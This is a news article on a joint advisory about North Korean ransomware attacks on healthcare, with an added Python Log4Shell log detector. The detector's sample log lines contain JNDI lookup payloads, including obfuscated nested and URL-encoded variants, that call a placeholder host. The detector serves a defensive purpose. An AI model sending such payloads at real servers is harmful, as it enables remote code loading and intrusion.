
North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations

Feb 10, 2023 | Ravie Lakshmanan | Threat Intelligence / Ransomware


State-backed hackers from North Korea are conducting ransomware
attacks against healthcare and critical infrastructure facilities
to fund illicit activities, U.S. and South Korean cybersecurity and
intelligence agencies warned in a joint advisory.

The attacks, which demand cryptocurrency ransoms in exchange for
recovering access to encrypted files, are designed to support North
Korea’s national-level priorities and objectives.

This includes “cyber operations targeting the United States and
South Korea governments — specific targets include Department of
Defense Information Networks and Defense Industrial Base member
networks,” the authorities said[1].

Threat actors associated with North Korea have been linked[2]
to espionage[3], financial theft[4], and cryptojacking
operations for years, including the infamous WannaCry ransomware attacks[5] of 2017 that infected
hundreds of thousands of machines located in over 150
countries.

Since then, North Korean nation-state crews have dabbled in
multiple ransomware strains such as VHD[6], Maui[7], and H0lyGh0st[8]
to generate a steady stream of illegal revenues for the
sanctions-hit regime.

Besides procuring its infrastructure with cryptocurrency
generated through its criminal activities, the adversary is known
to operate under third-party foreign affiliate identities to
conceal its involvement.

Attack chains mounted by the hacking crew entail the
exploitation of known security flaws in Apache Log4j, SonicWall,
and TerraMaster NAS appliances (e.g., CVE-2021-44228[9], CVE-2021-20038[10], and CVE-2022-24990[11]) to gain initial
access, followed by reconnaissance, lateral movement, and
ransomware deployment.
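Of the three initial-access flaws named above, CVE-2021-44228 (Log4Shell) is the one most visible in ordinary web-server logs, because exploitation attempts arrive as a `${jndi:...}` lookup string in a request header or parameter. The following is an added example, not code from the advisory or from The Hacker News: a small Python detector that scans access-log lines for that lookup, after undoing URL encoding and the common `${lower:j}` / `${::-j}` lookup-nesting tricks attackers use to dodge naive string matches. The log lines, host addresses and request paths are constructed for the example (the addresses are from the RFC 5737 documentation range).

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory). Lines 2-4 carry a
# JNDI lookup in plain, nested-lookup and URL-encoded form respectively.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Feb/2023:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Feb/2023:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Feb/2023:12:00:03 +0000] "GET /?q=${${lower:j}ndi:rmi://203.0.113.10/b} HTTP/1.1" 404 0 "-" "curl/7.88"',
    '10.0.0.9 - - [10/Feb/2023:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.10%2Fc%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.7 - - [10/Feb/2023:12:00:05 +0000] "POST /api/login HTTP/1.1" 401 23 "-" "okhttp/4.9"',
]

# ${lower:x} / ${upper:x} case-conversion lookups collapse to their argument.
CASE_LOOKUP_RE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
# ${anything:-default} default-value lookups collapse to the default, e.g. ${::-j} -> j.
DEFAULT_VALUE_RE = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# The JNDI lookup itself, matched only after the string has been normalized.
JNDI_RE = re.compile(r'\$\{jndi:([a-z]+)://([^}\s"]*)', re.IGNORECASE)


def normalize(text: str, max_rounds: int = 8) -> str:
    """Undo URL encoding (single or double) and collapse nested Log4j lookups
    until the string stops changing. The round limit keeps hostile input
    from turning the normalizer into a CPU sink."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        collapsed = CASE_LOOKUP_RE.sub(lambda m: m.group(1), text)
        collapsed = DEFAULT_VALUE_RE.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def scan(lines):
    """Return one finding per log line that carries a JNDI lookup.
    'obfuscated' flags lines where the lookup was hidden behind encoding
    or nested lookups, i.e. lines a plain '${jndi:' grep would miss."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = JNDI_RE.search(normalize(line))
        if match:
            findings.append({
                "line": lineno,
                "scheme": match.group(1).lower(),   # ldap, ldaps, rmi, dns, iiop ...
                "target": match.group(2),           # callback host/path the victim would contact
                "obfuscated": "${jndi:" not in line.lower(),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The `target` field is what makes such a finding actionable for responders: it is the host the vulnerable server would reach out to, so an egress-firewall log showing a connection to it distinguishes a blocked scan from a successful exploitation.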

In addition to using privately developed ransomware, the actors
have been observed leveraging off-the-shelf tools like BitLocker,
DeadBolt, ech0raix, Jigsaw, and YourRansom for encrypting files,
and even impersonating other ransomware groups such as
REvil.

As mitigations, the agencies recommend that organizations
implement the principle of least privilege, disable unnecessary
network device management interfaces, enforce multi-layer network
segmentation, require phishing-resistant authentication controls,
and maintain periodic data backups.

The alert comes as a new report from the United Nations found
that North Korean hackers stole record-breaking virtual assets
estimated to be worth between $630 million and more than $1 billion
in 2022.

The report, seen by the Associated Press[12], said the threat actors
used increasingly sophisticated techniques to gain access to
digital networks involved in cyberfinance, and to steal information
from governments, companies, and individuals that could be useful
in North Korea’s nuclear and ballistic missile programs.

It further called out Kimsuky[13], Lazarus Group[14], and Andariel[15], which are all part of
the Reconnaissance General Bureau (RGB[16]), for continuing to
target victims with the goal of creating revenue and soliciting information[17] of value to the hermit
kingdom.


References

  1. said (www.cisa.gov)
  2. linked (www.cisa.gov)
  3. espionage (thehackernews.com)
  4. financial theft (thehackernews.com)
  5. WannaCry ransomware attacks (thehackernews.com)
  6. VHD (thehackernews.com)
  7. Maui (thehackernews.com)
  8. H0lyGh0st (thehackernews.com)
  9. CVE-2021-44228 (nvd.nist.gov)
  10. CVE-2021-20038 (nvd.nist.gov)
  11. CVE-2022-24990 (nvd.nist.gov)
  12. seen by the Associated Press (apnews.com)
  13. Kimsuky (thehackernews.com)
  14. Lazarus Group (thehackernews.com)
  15. Andariel (thehackernews.com)
  16. RGB (www.mandiant.com)
  17. soliciting information (twitter.com)
  18. Twitter (twitter.com)
  19. LinkedIn (www.linkedin.com)
